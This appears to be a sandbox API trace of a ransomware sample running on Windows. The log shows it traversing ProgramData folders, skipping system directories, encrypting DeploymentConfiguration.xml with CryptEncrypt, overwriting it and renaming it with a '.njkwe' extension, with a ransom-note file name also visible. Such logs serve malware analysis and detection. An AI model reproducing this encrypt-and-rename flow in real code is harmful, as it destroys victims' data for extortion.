[0068.851] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.851] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.851] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.851] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.851] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.851] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\.") returned 53 [0068.851] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.852] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845f41a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.852] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.852] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.852] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.852] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.852] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.852] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\..") returned 54 [0068.852] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.852] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.852] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Catalog", cAlternateFileName="")) returned 1 [0068.852] lstrcmpiW (lpString1="Catalog", lpString2="Windows") returned -1 [0068.852] lstrcmpiW (lpString1="Catalog", lpString2="$Recycle.bin") returned 1 [0068.852] lstrcmpiW (lpString1="Catalog", lpString2="System Volume Information") returned -1 [0068.852] lstrcmpiW (lpString1="Catalog", lpString2="Program Files") returned -1 [0068.852] lstrcmpiW (lpString1="Catalog", lpString2="Program Files (x86)") returned -1 [0068.852] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned 59 [0068.852] lstrcmpW (lpString1="Catalog", lpString2=".") returned 1 [0068.852] lstrcmpW (lpString1="Catalog", lpString2="..") returned 1 [0068.852] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.852] GetProcessHeap () returned 0xbe0000 [0068.852] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0068.852] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*") returned 61 [0068.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a260 [0068.852] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.852] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.852] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.853] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.853] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.853] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\.") returned 61 [0068.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.853] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.853] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.853] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.853] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.853] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.853] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.853] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\..") returned 62 [0068.853] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.853] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Packages", cAlternateFileName="")) returned 1 [0068.853] lstrcmpiW (lpString1="Packages", lpString2="Windows") returned -1 [0068.853] lstrcmpiW (lpString1="Packages", lpString2="$Recycle.bin") returned 1 [0068.853] lstrcmpiW (lpString1="Packages", lpString2="System Volume Information") returned -1 [0068.853] lstrcmpiW (lpString1="Packages", lpString2="Program Files") returned -1 [0068.853] lstrcmpiW (lpString1="Packages", lpString2="Program Files (x86)") returned -1 [0068.853] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned 68 [0068.853] lstrcmpW (lpString1="Packages", lpString2=".") returned 1 [0068.853] lstrcmpW (lpString1="Packages", lpString2="..") returned 1 [0068.853] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.853] GetProcessHeap () returned 0xbe0000 [0068.853] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc36140 [0068.853] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*") returned 70 [0068.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2e0 [0068.854] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.854] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.854] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.854] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.854] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.854] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\.") returned 70 [0068.854] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.854] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.854] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.854] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.854] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.854] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.854] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.854] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\..") returned 71 [0068.854] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.854] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0068.854] lstrcmpiW (lpString1="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="Windows") returned -1 [0068.854] lstrcmpiW (lpString1="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="$Recycle.bin") returned 1 [0068.854] lstrcmpiW (lpString1="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="System Volume Information") returned -1 [0068.854] lstrcmpiW (lpString1="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="Program Files") returned -1 [0068.855] lstrcmpiW (lpString1="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="Program Files (x86)") returned -1 [0068.855] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned 107 [0068.855] lstrcmpW (lpString1="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2=".") returned 1 [0068.855] lstrcmpW (lpString1="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="..") returned 1 [0068.855] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.855] GetProcessHeap () returned 0xbe0000 [0068.855] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0068.855] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*") returned 109 [0068.855] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x380eb78 | out: lpFindFileData=0x380eb78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0068.855] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.855] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.855] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.855] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.855] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.855] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\.") returned 109 [0068.855] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.855] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380eb78 | out: lpFindFileData=0x380eb78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.855] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.855] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.855] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.855] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.855] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.855] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\..") returned 110 [0068.855] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.855] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.855] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380eb78 | out: lpFindFileData=0x380eb78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3cb8e906, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3cb8e906, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 1 [0068.855] lstrcmpiW (lpString1="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="Windows") returned -1 [0068.856] lstrcmpiW (lpString1="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="$Recycle.bin") returned 1 [0068.856] lstrcmpiW (lpString1="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="System Volume Information") returned -1 [0068.856] lstrcmpiW (lpString1="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="Program Files") returned -1 [0068.856] lstrcmpiW (lpString1="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="Program Files (x86)") returned -1 [0068.856] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned 146 [0068.856] lstrcmpW (lpString1="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2=".") returned 1 [0068.856] lstrcmpW (lpString1="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="..") returned 1 [0068.856] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.856] GetProcessHeap () returned 0xbe0000 [0068.856] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0068.856] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*") returned 148 [0068.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x380e8f0 | out: lpFindFileData=0x380e8f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3cb8e906, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3cb8e906, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0068.856] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.856] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.856] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.856] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.856] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.856] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\.") returned 148 [0068.857] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.857] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380e8f0 | out: lpFindFileData=0x380e8f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3cb8e906, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3cb8e906, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.857] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.857] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.857] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.857] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.857] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.857] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\..") returned 149 [0068.857] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.857] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.857] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380e8f0 | out: lpFindFileData=0x380e8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3c4670e0, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DeploymentConfiguration.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0068.857] lstrcmpiW (lpString1="DeploymentConfiguration.xml", lpString2="Windows") returned -1 [0068.857] lstrcmpiW (lpString1="DeploymentConfiguration.xml", lpString2="$Recycle.bin") returned 1 [0068.857] lstrcmpiW (lpString1="DeploymentConfiguration.xml", lpString2="System Volume Information") returned -1 [0068.857] lstrcmpiW (lpString1="DeploymentConfiguration.xml", lpString2="Program Files") returned -1 [0068.857] lstrcmpiW (lpString1="DeploymentConfiguration.xml", lpString2="Program Files (x86)") returned -1 [0068.857] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml") returned 174 [0068.857] StrStrIW (lpFirst="DeploymentConfiguration.xml", lpSrch=".njkwe") returned 0x0 [0068.857] lstrcmpW (lpString1="DeploymentConfiguration.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.857] lstrcmpW (lpString1="DeploymentConfiguration.xml", lpString2="taridd") returned -1 [0068.857] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.857] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0068.857] GetTickCount () returned 0x115199f [0068.858] GetTickCount () returned 0x115199f [0068.858] GetTickCount () returned 0x115199f [0068.858] GetTickCount () returned 0x115199f [0068.858] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x2c, dwBufLen=0x80 | out: pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x80) returned 1 [0068.858] GetProcessHeap () returned 0xbe0000 [0068.858] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0068.858] ReadFile (in: hFile=0x444, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380e8b4*=0x266, lpOverlapped=0x0) returned 1 [0068.860] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.860] WriteFile (in: hFile=0x444, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380e8b4*=0x266, lpOverlapped=0x0) returned 1 [0068.860] GetProcessHeap () returned 0xbe0000 [0068.860] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0068.860] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.860] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380e8b4*=0x300, lpOverlapped=0x0) returned 1 [0068.860] WriteFile (in: hFile=0x444, lpBuffer=0x380e800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x380e800*, lpNumberOfBytesWritten=0x380e8b4*=0x80, lpOverlapped=0x0) returned 1 [0068.860] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380e8b4*=0x4, lpOverlapped=0x0) returned 1 [0068.860] CloseHandle (hObject=0x444) returned 1 [0068.860] GetProcessHeap () returned 0xbe0000 [0068.860] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc4d848 [0068.860] wnsprintfW (in: pszDest=0xc4d848, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml_r00t_{3sXlE5}.njkwe") returned 194 [0068.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\deploymentconfiguration.xml_r00t_{3sxle5}.njkwe")) returned 1 [0068.861] GetProcessHeap () returned 0xbe0000 